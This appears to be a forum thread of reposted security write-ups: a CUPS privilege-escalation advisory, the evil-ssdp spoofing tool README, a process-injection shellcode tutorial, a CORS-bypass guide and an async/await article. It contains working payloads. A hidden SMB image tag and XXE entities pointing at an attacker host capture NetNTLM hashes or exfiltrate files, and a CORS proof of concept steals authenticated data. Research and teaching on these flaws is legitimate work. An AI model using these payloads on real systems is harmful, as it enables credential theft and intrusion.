[1] Okay, what people usually mean is that you shouldn't use your own cryptography for things that actually matter, but I think a lot of the warnings are interpreted or extended to, "Don't bother implementing cryptographic algorithms, just understand them at a fuzzy high level." I imagine this results in fewer resources for people looking to learn cryptography and the mathematics behind it, and at least it prohibits them from appreciating how much really goes into an industry-strength solution. And this mindset is what made the NSA backdoor so easy: the devil was in the details. ↑

[2] From my heavily biased standpoint as a mathematician. ↑

Sursa: https://jeremykun.com/2014/02/08/introducing-elliptic-curves/
-
CUPS Local Privilege Escalation and Sandbox Escapes Wednesday, July 11, 2018 at 7:25PM Gotham Digital Science has discovered multiple vulnerabilities in Apple’s CUPS print system affecting macOS 10.13.4 and earlier and multiple Linux distributions. All information in this post has been shared with Apple and other affected vendors prior to publication as part of the coordinated disclosure process. All code is excerpted from Apple’s open source CUPS repository located at https://github.com/apple/cups The vulnerabilities allow for local privilege escalation to root (CVE-2018-4180), multiple sandbox escapes (CVE-2018-4182 and CVE-2018-4183), and unsandboxed root-level local file reads (CVE-2018-4181). A related AppArmor-specific sandbox escape (CVE-2018-6553) was also discovered affecting Linux distributions such as Debian and Ubuntu. When chained together, these vulnerabilities allow an unprivileged local attacker to escalate to unsandboxed root privileges on affected systems. Affected Linux systems include those that allow non-root users to modify cupsd.conf such as Debian and Ubuntu. Redhat and related distributions are generally not vulnerable by default. Consult distribution-specific documentation and security advisories for more information. The vulnerabilities were patched in macOS 10.13.5, and patches are currently available for Debian and Ubuntu systems. GDS would like to thank Apple, Debian, and Canonical for working to patch the vulnerabilities, and CERT for assisting in vendor coordination. Sursa: https://blog.gdssecurity.com/labs/2018/7/11/cups-local-privilege-escalation-and-sandbox-escapes.html
-
Overview This tool responds to SSDP multicast discover requests, posing as a generic UPNP device on a local network. Your spoofed device will magically appear in Windows Explorer on machines in your local network. Users who are tempted to open the device are shown a configurable webpage. By default, this page will load a hidden image over SMB, allowing you to capture or relay the NetNTLM challenge/response. This works against Windows 10 systems (even if they have disabled NETBIOS and LLMNR) and requires no existing credentials to execute. As a bonus, this tool can also detect and exploit potential zero-day vulnerabilities in the XML parsing engines of applications using SSDP/UPNP. To try this, use the 'xxe-smb' template. If a vulnerable device is found, it will alert you in the UI and then mount your SMB share with NO USER INTERACTION required via an XML External Entity (XXE) attack. If you get lucky and find one of those, you can probably snag yourself a nice snazzy CVE (please reference evilSSDP in the disclosure if you do). Demo Video Usage A typical run looks like this: essdp.py eth0 You need to provide the network interface at a minimum. The interface is used for both the UDP SSDP interaction as well as hosting a web server for the XML files and phishing page. The port is used only for the web server and defaults to 8888. The tool will automatically inject an IMG tag into the phishing page using the IP of the interface you provide. To work with hashes, you'll need to launch an SMB server at that interface (like Impacket). This address can be customized with the -s option. You do NOT need to edit the variables in the template files - the tool will do this automatically. You can choose between the included templates in the "templates" folder or build your own simply by duplicating an existing folder and editing the files inside. 
This allows you to customize the device name, the phishing contents page, or even build a totally new type of UPNP device that I haven't created yet.

usage: essdp.py [-h] [-p PORT] [-t TEMPLATE] interface

positional arguments:
  interface             Network interface to listen on.

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  Port for HTTP server. Defaults to 8888.
  -t TEMPLATE, --template TEMPLATE
                        Name of a folder in the templates directory. Defaults
                        to "password-vault". This will determine xml and
                        phishing pages used.
  -s SMB, --smb SMB     IP address of your SMB server. Defaults to the
                        primary address of the "interface" provided.

Templates

The following templates come with the tool. If you have good design skills, please contribute one of your own!

bitcoin: Will show up in Windows Explorer as "Bitcoin Wallet". Phishing page is just a random set of Bitcoin private/public/address info. There are no actual funds in these accounts.

password-vault: Will show up in Windows Explorer as "IT Password Vault". Phishing page contains a short list of fake passwords / ssh keys / etc.

xxe-smb: Will not likely show up in Windows Explorer. Used for finding zero-day vulnerabilities in XML parsers. Will trigger an "XXE - VULN" alert in the UI for hits and will attempt to force clients to authenticate with the SMB server, with 0 interaction.

xxe-exfil: Another example of searching for XXE vulnerabilities, but this time attempting to exfiltrate a test file from a Windows host. Of course you can customize this to look for whatever specific file you are after, Windows or Linux. In the vulnerable applications I've discovered, exfiltration works only on a file with no whitespace or linebreaks. This is due to how it is injected into the URL of a GET request. If you get this working on multi-line files, PLEASE let me know how you did it.
Technical Details

Simple Service Discovery Protocol (SSDP) is used by operating systems (Windows, MacOS, Linux, IOS, Android, etc) and applications (Spotify, Youtube, etc) to discover shared devices on a local network. It is the foundation for discovering and advertising Universal Plug & Play (UPNP) devices.

Devices attempting to discover shared network resources will send a UDP multicast out to 239.255.255.250 on port 1900. The source port is randomized. An example request looks like this:

M-SEARCH * HTTP/1.1
Host: 239.255.255.250:1900
ST: upnp:rootdevice
Man: "ssdp:discover"
MX: 3

To interact with this host, we need to capture both the source port and the 'ST' (Service Type) header. The response MUST be sent to the correct source port and SHOULD include the correct ST header. Note that it is not just the Windows OS looking for devices - scanning a typical network will show a large amount of requests from applications inside the OS (like Spotify), mobile phones, and other media devices. Windows will only play ball if you reply with the correct ST; other sources are more lenient.

evilSSDP will extract the requested ST and send a response like the following:

HTTP/1.1 200 OK
CACHE-CONTROL: max-age=1800
DATE: Tue, 26 Jun 2018 01:06:26 GMT
EXT:
LOCATION: http://192.168.1.131:8888/ssdp/device-desc.xml
SERVER: Linux/3.10.96+, UPnP/1.0, eSSDP/0.1
ST: upnp:rootdevice
USN: uuid:e415ce0a-3e62-22d0-ad3f-42ec42e36563:upnp-rootdevice
BOOTID.UPNP.ORG: 0
CONFIGID.UPNP.ORG: 1

The location IP, ST, and date are constructed dynamically. This tells the requestor where to find more information about our device. Here, we are forcing Windows (and other requestors) to access our 'Device Descriptor' xml file and parse it. The USN is just a random string and needs only to be unique and formatted properly. evilSSDP will pull the 'device.xml' file from the chosen templates folder and dynamically plug in some variables such as your IP address.
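To make the request/response flow concrete, here is a simplified sketch (not evilSSDP's actual implementation; the header values are placeholders taken from the example above) of extracting the ST header from an M-SEARCH datagram and echoing it back in the reply:

```python
def build_ssdp_reply(msearch, local_ip="192.168.1.131", port=8888):
    # Pull the requested Service Type out of the M-SEARCH request
    st = "upnp:rootdevice"
    for line in msearch.decode(errors="replace").splitlines():
        if line.lower().startswith("st:"):
            st = line.split(":", 1)[1].strip()
    # Echo the ST back so Windows accepts the response
    return ("HTTP/1.1 200 OK\r\n"
            "CACHE-CONTROL: max-age=1800\r\n"
            "EXT:\r\n"
            "LOCATION: http://%s:%d/ssdp/device-desc.xml\r\n"
            "ST: %s\r\n"
            "USN: uuid:e415ce0a-3e62-22d0-ad3f-42ec42e36563::%s\r\n"
            "\r\n" % (local_ip, port, st, st))

req = (b'M-SEARCH * HTTP/1.1\r\nHost: 239.255.255.250:1900\r\n'
       b'ST: upnp:rootdevice\r\nMan: "ssdp:discover"\r\nMX: 3\r\n\r\n')
print("ST: upnp:rootdevice" in build_ssdp_reply(req))  # True
```

In the real tool the reply is, of course, sent back over UDP to the requester's randomized source port.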
This 'Device Descriptor' file is where you can customize some juicy-sounding friendly names and descriptions. It looks like this:

<root>
  <specVersion>
    <major>1</major>
    <minor>0</minor>
  </specVersion>
  <device>
    <deviceType>urn:schemas-upnp-org:device:Basic:1</deviceType>
    <friendlyName>IT Password Vault</friendlyName>
    <manufacturer>PasSecure</manufacturer>
    <manufacturerURL>http://passecure.com</manufacturerURL>
    <modelDescription>Corporate Password Repository</modelDescription>
    <modelName>Core</modelName>
    <modelNumber>1337</modelNumber>
    <modelURL>http://passsecure.com/1337</modelURL>
    <serialNumber>1337</serialNumber>
    <UDN>uuid:e415ce0a-3e62-22d0-ad3f-42ec42e36563</UDN>
    <serviceList>
      <service>
        <URLBase>http://$localIp:$localPort</URLBase>
        <serviceType>urn:ecorp.co:service:ePNP:1</serviceType>
        <serviceId>urn:epnp.ecorp.co:serviceId:ePNP</serviceId>
        <controlURL>/epnp</controlURL>
        <eventSubURL/>
        <SCPDURL>/service-desc.xml</SCPDURL>
      </service>
    </serviceList>
    <presentationURL>http://$localIp:$localPort/present.html</presentationURL>
  </device>
</root>

A key line in this file contains the 'Presentation URL'. This is what will load in a user's browser if they decide to manually double-click on the UPNP device. evilSSDP will host this file automatically (present.html from the chosen template folder), plugging your source IP address into an IMG tag to access an SMB share that you can host with tools like Impacket, Responder, or Metasploit. The IMG tag looks like this:

<img src="file://///$localIp/smb/hash.jpg" style="display: none;" /><br>

Zero-Day Hunting

By default, this tool essentially forces devices on the network to parse an XML file. A well-known attack against applications that parse XML exists - XML External Entity Processing (XXE). This type of attack against UPNP devices is likely overlooked - simply because the attack method is complex and not readily apparent. However, evilSSDP makes it very easy to test for vulnerable devices on your network.
Simply run the tool and look for a big [XXE VULN!!!] in the output. NOTE: using the xxe template will likely not spawn visible evil devices across the LAN; it is meant only for zero-interaction scenarios. This is accomplished by providing a Device Descriptor XML file with the following content:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file://///$smbServer/smb/hash.jpg" >
  <!ENTITY xxe-url SYSTEM "http://$localIp:$localPort/ssdp/xxe.html" >
]>
<hello>&xxe;&xxe-url;</hello>

When a vulnerable XML parser reads this file, it will automatically mount the SMB share (allowing you to crack the hash or relay) as well as access an HTTP URL to notify you it was discovered. The notification will contain the HTTP headers and an IP address, which should give you some info on the vulnerable application. If you see this, please do contact the vendor to fix the issue. Also, I would love to hear about any zero days you find using the tool.

Customization

This is an early beta, but constructed in such a way to allow easy template creation in the future. I've included two very basic templates - simply duplicate a template folder and customize for your own use. Then use the '-t' parameter to choose your new template.

The tool currently only correctly creates devices for the UPNP 'rootdevice' device type, although it is responding to the SSDP queries for all device types. If you know UPNP well, you can create a new template with the correct parameters to fulfill requests for other device types as well.

Thanks

Thanks to ZeWarren and his project here. I used this extensively to understand how to get the basics for SSDP working. Also thanks to Microsoft for developing lots of fun insecure things to play with.

Sursa: https://gitlab.com/initstring/evil-ssdp
-
Process Injection: Writing the payload Posted on July 12, 2018 by odzhan Introduction The purpose of this post is to discuss a Position Independent Code (PIC) written in C that will be used for demonstrating process injection on the Windows operating system. The payload will simply execute an instance of the calculator, and is not intended to be malicious in any way. In follow up posts, I’ll discuss a number of injection methods to help the reader understand how they work. Below is a screenshot of the PROPagate method in action, that I’ll hopefully discuss in a follow up post. Function prototypes Most of the injection methods require a PIC to run successfully in a remote process space, unless of course one wants to load a Dynamic-link Library. (DLL) In the case of loading a DLL, one only needs to execute the LoadLibrary API providing the path of a DLL as parameter. Traditionally, PICs have been written in C or assembly, but there are problems when using pure assembly code. Consider that Windows can run on multiple architectures (e.g x86,amd64,arm), with multiple calling conventions (e.g stdcall,fastcall). What if corrections or changes to the code are required? For those reasons, it makes more sense to use a High-level Language (HLL) like C. Some of the methods that will be discussed have individual requirements. Some of the callback functions executed will be passed a number of parameters, and due to calling convention will expect those parameters be removed upon returning to the caller. Thread procedure Creating a new thread in a remote process can be performed using one of the following API. CreateRemoteThread RtlCreateUserThread NtCreateThreadEx ZwCreateThreadEx Each API expects a pointer to a ThreadProc callback function. The following is defined in the Windows SDK. This is also perfect for LoadLibrary that only expects one parameter. 
DWORD WINAPI ThreadProc(
  _In_ LPVOID lpParameter);

Asynchronous Procedure Call

It's also possible to attach a PIC to an existing thread by using one of the following API. The thread must be alertable for this to work, and there's no convenient way to determine if a thread is alertable or not.

QueueUserAPC
NtQueueApcThread
NtQueueApcThreadEx
ZwQueueApcThread
ZwQueueApcThreadEx
RtlQueueApcWow64Thread

VOID CALLBACK APCProc(
  _In_ ULONG_PTR dwParam);

WindowProc callback function

Some of you will know of the Extra Window Memory (EWM) injection method. The well-known method involves replacing the "CTray" object that is used to control the behavior of the "Shell_TrayWnd" class registered by explorer.exe. Some versions of Windows permit updating this object via SetWindowLongPtr, therefore allowing code execution without the creation of a new thread, but more on that later! The following API can be used to update the window's callback function.

SetWindowLong (32-bit)
GetWindowLong (32-bit)
SetWindowLongPtr (32 and 64-bit)
GetWindowLongPtr (32 and 64-bit)

LRESULT CALLBACK WindowProc(
  _In_ HWND hwnd,
  _In_ UINT uMsg,
  _In_ WPARAM wParam,
  _In_ LPARAM lParam);

Subclass callback function

The PROPagate method is named after the APIs GetProp and SetProp used to change the address of a callback function for a subclassed window. As of July 2018, this is a relatively new technique that's similar to the EWM injection or shatter attacks described in 2002. The following API (but not all) may be of interest.

GetProp
SetProp
EnumProps

typedef LRESULT (CALLBACK *SUBCLASSPROC)(
  HWND hWnd,
  UINT uMsg,
  WPARAM wParam,
  LPARAM lParam,
  UINT_PTR uIdSubclass,
  DWORD_PTR dwRefData);

Dynamic-link Library (DLL)

Although not a PIC, process injection can sometimes involve loading a DLL. Compiling the payload into a DLL is therefore an option.
__declspec(dllexport)
BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD fdwReason, LPVOID lpvReserved);

Compiling

To generate the appropriate payload using the correct parameters and return type, we use the define directive. If we need to compile the payload for another function prototype, it would be relatively easy to amend this code.

#ifdef XAPC
// Asynchronous Procedure Call
VOID CALLBACK APCProc(ULONG_PTR dwParam)
#endif

#ifdef THREAD
// Create remote thread
DWORD WINAPI ThreadProc(LPVOID lpParameter)
#endif

#ifdef SUBCLASS
// Window subclass callback procedure
LRESULT CALLBACK SubclassProc(HWND hWnd, UINT uMsg, WPARAM wParam,
  LPARAM lParam, UINT_PTR uIdSubclass, DWORD_PTR dwRefData)
#endif

#ifdef WINDOW
// Window callback procedure
LRESULT CALLBACK WndProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
#endif

#ifdef DLL
// compile as Dynamic-link Library
#pragma warning( push )
#pragma warning( disable : 4100 )
__declspec(dllexport)
BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD fdwReason, LPVOID lpvReserved)
#endif

What if the payload is called multiple times? For each method discussed, I will address that question.

Declaring strings

If you declare a string in C and compile the source into an executable, you might find string literals stored in a read-only section of memory. This is a problem for a PIC because we need all variables, including strings, stored on the stack. To illustrate the problem, consider the following simple piece of code.

#include <stdio.h>

int main(void){
    char msg[]="Hello, World!\n";
    printf("%s", msg);
    return 0;
}

Although the assembly output of the MSVC compiler isn't very readable, it shows the stack isn't used for local storage of the string literal. The solution might be declaring the string as a byte array, like the following.

#include <stdio.h>

int main(void){
    char msg[]={'H','e','l','l','o',',',' ','W','o','r','l','d','!','\n',0};
    printf("%s", msg);
    return 0;
}

The assembly output of this shows MSVC will use the local stack.
This works for MSVC, but unfortunately not for GCC, which will still store the string in a read-only section of the executable. What other options are there?

Use inline assembly

If I recall correctly, it was Z0MBiE/29a who once suggested in Solving Plain Strings Problem In HLL using macro-based assembly with the Borland C compiler to store strings on the stack for the purpose of obfuscation. In Phrack #69, Shellcode the better way, or how to just use your compiler, fishstiqz suggests using an inline macro.

#define INLINE_STR(name, str) \
    const char * name;        \
    asm(                      \
      "call 1f\n"             \
      ".asciz \"" str "\"\n"  \
      "1:\n"                  \
      "pop %0\n"              \
      : "=r" (name)           \
    );

The macro can be used with the following.

INLINE_STR(kernel32, "kernel32");
PVOID pKernel32 = scGetModuleBase(kernel32);

We're depending on assembly code here, and that's precisely what we should avoid. We also can't inline 64-bit assembly, as fishstiqz points out. What else?

Declaration using arrays

After examining various options, and having taken the advice of others (@solardiz), declaring strings as 32-bit arrays solves the problem for both GCC and MSVC.

#include <stdio.h>

typedef unsigned int W;

int main(void){
    W msg[4];
    msg[0]=*(W*)"Hell";
    msg[1]=*(W*)"o, W";
    msg[2]=*(W*)"orld";
    msg[3]=*(W*)"!\n";
    printf("%s", (char*)msg);
    return 0;
}

As you can see from the MSVC and GCC output, both place the string on the stack. Of course, it would make sense to automate this process, rather than try to initialize it manually 😉

Declaring function pointers

You don't have to declare function pointers in this way, but for a shellcode, it makes the code much easier to read.
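As the author hints, generating those word-sized initializers by hand is tedious and easy to automate. A hypothetical Python helper (my own sketch, not from the post) that pads a string to 4-byte words and emits little-endian hex initializers could look like:

```python
import struct

def to_w_array(name, s):
    data = (s + "\0").encode()
    data += b"\0" * (-len(data) % 4)              # pad to a 4-byte multiple
    out = ["W %s[%d];" % (name, len(data) // 4)]
    for i in range(0, len(data), 4):
        (w,) = struct.unpack_from("<I", data, i)  # little-endian 32-bit word
        out.append("%s[%d]=0x%08x;" % (name, i // 4, w))
    return "\n".join(out)

print(to_w_array("msg", "Hello, World!\n"))
# msg[0] becomes 0x6c6c6548 -- the little-endian word for "Hell"
```

Emitting hex constants rather than `*(W*)"Hell"` casts also sidesteps any embedded NUL or quote characters in the source string.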
typedef HANDLE (WINAPI *OpenEvent_t)(
  _In_ DWORD dwDesiredAccess,
  _In_ BOOL bInheritHandle,
  _In_ LPCTSTR lpName);

typedef BOOL (WINAPI *SetEvent_t)(
  _In_ HANDLE hEvent);

typedef BOOL (WINAPI *CloseHandle_t)(
  _In_ HANDLE hObject);

typedef UINT (WINAPI *WinExec_t)(
  _In_ LPCSTR lpCmdLine,
  _In_ UINT uCmdShow);

Once the function type is defined, you can declare a pointer inside the main code, like so.

SetEvent_t pSetEvent;
OpenEvent_t pOpenEvent;
CloseHandle_t pCloseHandle;
WinExec_t pWinExec;

Resolving API addresses

Rather than cover the same ground, I recommend reading two posts about this task: Resolving API addresses in memory, and Fido, how it resolves GetProcAddress and LoadLibraryA. These both cover some good ways to resolve API addresses dynamically using the Import Address Table (IAT) and Export Address Table (EAT) of a Portable Executable (PE) file. Traversing the Process Environment Block (PEB) module list is commonly found in shellcodes, and it's required for a PIC to resolve the addresses of API functions.

// search all modules in the PEB for API
LPVOID xGetProcAddress(LPVOID pszAPI) {
    PPEB                  peb;
    PPEB_LDR_DATA         ldr;
    PLDR_DATA_TABLE_ENTRY dte;
    LPVOID                api_adr=NULL;

#if defined(_WIN64)
    peb = (PPEB) __readgsqword(0x60);
#else
    peb = (PPEB) __readfsdword(0x30);
#endif

    ldr = (PPEB_LDR_DATA)peb->Ldr;

    // for each DLL loaded
    dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;

    for (;dte->DllBase != NULL && api_adr == NULL;
          dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
    {
      // search the export table for api
      api_adr=FindExport(dte->DllBase, (PCHAR)pszAPI);
    }
    return api_adr;
}

Searching the Export Address Table (EAT)

One can certainly search the Import Address Table (IAT) for the address of an API, but the following uses the Export Address Table. This function doesn't handle forward references. Note that we're also searching by string, instead of hash.
// locate address of API in export address table
LPVOID FindExport(LPVOID base, PCHAR pszAPI){
    PIMAGE_DOS_HEADER       dos;
    PIMAGE_NT_HEADERS       nt;
    DWORD                   cnt, rva;
    PIMAGE_DATA_DIRECTORY   dir;
    PIMAGE_EXPORT_DIRECTORY exp;
    PDWORD                  adr;
    PDWORD                  sym;
    PWORD                   ord;
    PCHAR                   api, dll;
    LPVOID                  api_adr=NULL;

    dos = (PIMAGE_DOS_HEADER)base;
    nt  = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
    rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;

    // if no export table, return NULL
    if (rva==0) return NULL;

    exp = (PIMAGE_EXPORT_DIRECTORY) RVA2VA(ULONG_PTR, base, rva);
    cnt = exp->NumberOfNames;

    // if no api names, return NULL
    if (cnt==0) return NULL;

    adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions);
    sym = RVA2VA(PDWORD,base, exp->AddressOfNames);
    ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals);
    dll = RVA2VA(PCHAR, base, exp->Name);

    do {
      // get the api name string
      api = RVA2VA(PCHAR, base, sym[cnt-1]);
      // compare it with the requested name
      if (!xstrcmp(pszAPI, api)){
        // return address of function
        api_adr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]);
        return api_adr;
      }
    } while (--cnt && api_adr==0);
    return api_adr;
}

Summary

If we use C instead of assembly, writing a payload isn't that difficult. The next posts on this subject will cover some injection methods individually. I'll post source code shortly.

Sursa: https://modexp.wordpress.com/2018/07/12/process-injection-writing-payload/
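The code above compares export names as strings; many shellcodes instead compare a small hash of each name, such as the ROR-13 scheme popularized by Stephen Fewer's hash API. As an illustrative sketch of that style of hash (my own Python, not the author's code):

```python
def ror13_hash(name):
    # Hash an export name with rotate-right-13 and add, 32-bit wide
    h = 0
    for c in name.encode() + b"\x00":   # include the terminating null
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + c) & 0xFFFFFFFF
    return h

print(hex(ror13_hash("WinExec")))
```

Hashing keeps API name strings out of the payload entirely, at the cost of a (tiny) collision risk and less readable code.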
-
Advanced CORS Exploitation Techniques Posted by Corben Leo on June 16, 2018 Preface I’ve seen some fantastic research done by Linus Särud and by Bo0oM on how Safari’s handling of special characters could be abused. https://labs.detectify.com/2018/04/04/host-headers-safari/ https://lab.wallarm.com/the-good-the-bad-and-the-ugly-of-safari-in-client-side-attacks-56d0cb61275a Both articles dive into practical scenarios where Safari’s behavior can lead to XSS or Cookie Injection. The goal of this post is bring even more creativity and options to the table! Introduction: Last November, I wrote about a tricky cross-origin resource sharing bypass in Yahoo View that abused Safari’s handling of special characters. Since then, I’ve found more bugs using clever bypasses and decided to present more advanced techniques to be used. Note: This assumes you have a basic understanding of what CORS is and how to exploit misconfigurations. Here are some awesome posts to get you caught up: Portswigger’s Post Geekboy’s post Background: DNS & Browsers: Quick Summary: The Domain Name System is essentially an address book for servers. It translates/maps hostnames to IP addresses, making the internet easier to use. When you attempt to visit a URL into a browser: A DNS lookup is performed to convert the host to an IP address ⇾ it initiates a TCP connection to the server ⇾ the server responds with SYN+ACK ⇾ the browser sends an HTTP request to the server to retrieve content ⇾ then renders / displays the content accordingly. If you’re a visual thinker, here is an image of the process. DNS servers respond to arbitrary requests – you can send any characters in a subdomain and it’ll respond as long as the domain has a wildcard DNS record. Example: dig A "<@$&(#+_\`^%~>.withgoogle.com" @1.1.1.1 | grep -A 1 "ANSWER SECTION" Browsers? So we know DNS servers respond to these requests, but how do browsers handle them? Answer: Most browsers validate domain names before making any requests. 
Examples:

Chrome:
Firefox:
Safari:

Notice how I said most browsers validate domain names - not all of them do. Safari is the divergent one: if we attempt to load the same domain, it will actually send the request and load the page:

We can use all sorts of different characters, even unprintable ones:

,&'";!$^*()+=`~-_=|{}%
// non printable chars
%01-08,%0b,%0c,%0e,%0f,%10-%1f,%7f

Jumping into CORS Configurations

Most CORS integrations contain a whitelist of origins that are permitted to read information from an endpoint. This is usually done by using regular expressions.

Example #1:

^https?:\/\/(.*\.)?xxe\.sh$

Intent: The intent of implementing a configuration with this regex would be to allow cross-domain access from xxe.sh and any subdomain (http:// or https://). The only way an attacker would be able to steal data from this endpoint is if they had either an XSS or a subdomain takeover on http(s)://xxe.sh / http(s)://*.xxe.sh.

Example #2:

^https?:\/\/.*\.?xxe\.sh$

Intent: Same as Example #1 - allow cross-domain access from xxe.sh and any subdomain.

This regular expression is quite similar to the first example; however, it contains a problem that would cause the configuration to be vulnerable to data theft. The problem lies in the following regex: .*\.?

Breakdown:

.* = any characters except for line terminators
\. = a period
?  = a quantifier, in this case matching "." either zero or one times

Since .*\. is not in a capturing group (like in the first example), the ? quantifier only affects the . character, therefore any characters are allowed before the string "xxe.sh", regardless of whether there is a period separating them. This means an attacker could send any origin ending in xxe.sh and would have cross-domain access.
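That breakdown is easy to verify mechanically. A quick sketch with Python's re module (xxe.sh standing in for any target domain, as in the examples) shows Example #2 trusting an attacker-registered origin while still rejecting suffix tricks:

```python
import re

pattern = r"^https?:\/\/.*\.?xxe\.sh$"

print(bool(re.match(pattern, "https://sub.xxe.sh")))      # True - intended
print(bool(re.match(pattern, "https://attackerxxe.sh")))  # True - bypass!
print(bool(re.match(pattern, "https://xxe.sh.evil.com"))) # False - $ anchors the end
```

An attacker only needs to register attackerxxe.sh to pass the check - no subdomain takeover required.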
This is a pretty common bypass technique; here's a real example of it: https://hackerone.com/reports/168574 by James Kettle.

Example #3:

^https?:\/\/(.*\.)?xxe\.sh\:?.*

Intent: This would likely be implemented with the intent to allow cross-domain access from xxe.sh, all subdomains, and any ports on those domains. Can you spot the problem?

Breakdown:
\: = matches the literal character ":"
? = a quantifier; here it matches ":" either zero or one times
.* = any characters except line terminators

Just like in the second example, the ? quantifier only affects the : character. So if we send an origin with other characters after xxe.sh, it will still be accepted.

The Million Dollar Question: how does Safari's handling of special characters come into play when exploiting CORS misconfigurations?

Take the following Apache configuration for example:

SetEnvIf Origin "^https?:\/\/(.*\.)?xxe.sh([^\.\-a-zA-Z0-9]+.*)?" AccessControlAllowOrigin=$0
Header set Access-Control-Allow-Origin %{AccessControlAllowOrigin}e env=AccessControlAllowOrigin

This would likely be implemented with the intent of allowing cross-domain access from xxe.sh, all subdomains, and any ports on those domains. Here's a breakdown of the regular expression:

[^\.\-a-zA-Z0-9] = does not match these characters: "." "-" "a-z" "A-Z" "0-9"
+ = a quantifier; matches the above one or more times (greedy)
.* = any character(s) except line terminators

This API won't give access to domains like the ones in the previous examples, and other common bypass techniques won't work. A subdomain takeover or an XSS on *.xxe.sh would allow an attacker to steal data, but let's get more creative!

We know any origin of the form *.xxe.sh followed by the characters . - a-z A-Z 0-9 won't be trusted. What about an origin with a space after the string "xxe.sh"? We see that it's trusted; however, such a domain isn't supported in any normal browser. Since the regex only excludes alphanumeric ASCII characters and . -, special characters after "xxe.sh" would be trusted. Such a domain would be supported in a modern, common browser: Safari.

Exploitation:

Pre-requisites:
A domain with a wildcard DNS record pointing it to your box.
NodeJS

Like most browsers, Apache and Nginx (right out of the box) also don't like these special characters, so it's much easier to serve the HTML and JavaScript with NodeJS.

[+] serve.js

var http = require('http');
var url = require('url');
var fs = require('fs');
var port = 80;

http.createServer(function(req, res) {
    if (req.url == '/cors-poc') {
        fs.readFile('cors.html', function(err, data) {
            res.writeHead(200, {'Content-Type': 'text/html'});
            res.write(data);
            res.end();
        });
    } else {
        res.writeHead(200, {'Content-Type': 'text/html'});
        res.write('never gonna give you up...');
        res.end();
    }
}).listen(port, '0.0.0.0');
console.log(`Serving on port ${port}`);

In the same directory, save the following:

[+] cors.html

<!DOCTYPE html>
<html>
<head><title>CORS</title></head>
<body onload="cors();">
<center>
cors proof-of-concept:<br><br>
<textarea rows="10" cols="60" id="pwnz">
</textarea><br>
</center>
<script>
function cors() {
    var xhttp = new XMLHttpRequest();
    xhttp.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
            document.getElementById("pwnz").innerHTML = this.responseText;
        }
    };
    xhttp.open("GET", "http://x.xxe.sh/api/secret-data/", true);
    xhttp.withCredentials = true;
    xhttp.send();
}
</script>
</body>
</html>

Start the NodeJS server by running the following command:

node serve.js &

As stated before, since the regex only excludes alphanumeric ASCII characters and . -, special characters after "xxe.sh" would be trusted. So if we open Safari and visit http://x.xxe.sh{.<your-domain>/cors-poc, we will see that we were able to successfully steal data from the vulnerable endpoint.

Edit: It was brought to my attention that the _ character (in subdomains) is not only supported in Safari, but also in Chrome and Firefox!
Therefore http://x.xxe.sh_.<your-domain>/cors-poc would send a valid origin from the most common browsers! Thanks Prakash, you rock!

Practical Testing

With these special characters in mind, figuring out which origins are reflected in the Access-Control-Allow-Origin header can be a tedious, time-consuming task.

Introducing TheftFuzzer: to save time and become more efficient, I decided to code a tool that fuzzes CORS configurations for allowed origins. It's written in Python and generates a bunch of different permutations for possible CORS bypasses. It can be found on my GitHub here. If you have any ideas for improvements to the tool, feel free to ping me or make a pull request!

Outro

I hope this post has been informative and that you've learned from it! Go exploit those CORS configurations and earn some bounties 😝 Happy Hunting!

Corben Leo
https://twitter.com/hacker_
https://hackerone.com/cdl
https://bugcrowd.com/c
https://github.com/sxcurity

Sursa: https://www.sxcurity.pro/advanced-cors-techniques/
JavaScript async/await: The Good Part, Pitfalls and How to Use

The async/await syntax introduced by ES2017 is a fantastic improvement to asynchronous programming in JavaScript. It provides a way to write synchronous-style code that accesses resources asynchronously, without blocking the main thread. However, it is a bit tricky to use well. In this article we will explore async/await from different perspectives and show how to use it correctly and effectively.

The good part of async/await

The most important benefit async/await brings us is the synchronous programming style. Let's see an example.

// async/await
async getBooksByAuthorWithAwait(authorId) {
  const books = await bookModel.fetchAll();
  return books.filter(b => b.authorId === authorId);
}

// promise
getBooksByAuthorWithPromise(authorId) {
  return bookModel.fetchAll()
    .then(books => books.filter(b => b.authorId === authorId));
}

It is obvious that the async/await version is much easier to understand than the promise version. If you ignore the await keyword, the code reads just like any synchronous language, such as Python.

And the sweet spot is not only readability. async/await has native browser support. As of today, all the mainstream browsers fully support async functions.

All mainstream browsers support async functions. (Source: https://caniuse.com/)

Native support means you don't have to transpile the code. More importantly, it facilitates debugging. When you set a breakpoint at the function entry point and step over the await line, you will see the debugger pause briefly while bookModel.fetchAll() does its job, then move to the next .filter line! This is much easier than the promise case, in which you have to set up another breakpoint on the .filter line.

Debugging an async function: the debugger will wait at the await line and move to the next one on resolve.

Another less obvious benefit is the async keyword.
It declares that the getBooksByAuthorWithAwait() function's return value is guaranteed to be a promise, so callers can call getBooksByAuthorWithAwait().then(...) or await getBooksByAuthorWithAwait() safely. Think about this case (bad practice!):

getBooksByAuthorWithPromise(authorId) {
  if (!authorId) {
    return null;
  }
  return bookModel.fetchAll()
    .then(books => books.filter(b => b.authorId === authorId));
}

In the above code, getBooksByAuthorWithPromise may return a promise (the normal case) or a null value (the exceptional case), in which case the caller cannot call .then() safely. With the async declaration, this kind of code becomes impossible.

Async/await Could Be Misleading

Some articles compare async/await with Promise and claim it is the next generation in the evolution of JavaScript asynchronous programming, with which I respectfully disagree. Async/await IS an improvement, but it is no more than syntactic sugar, and it will not change our programming style completely.

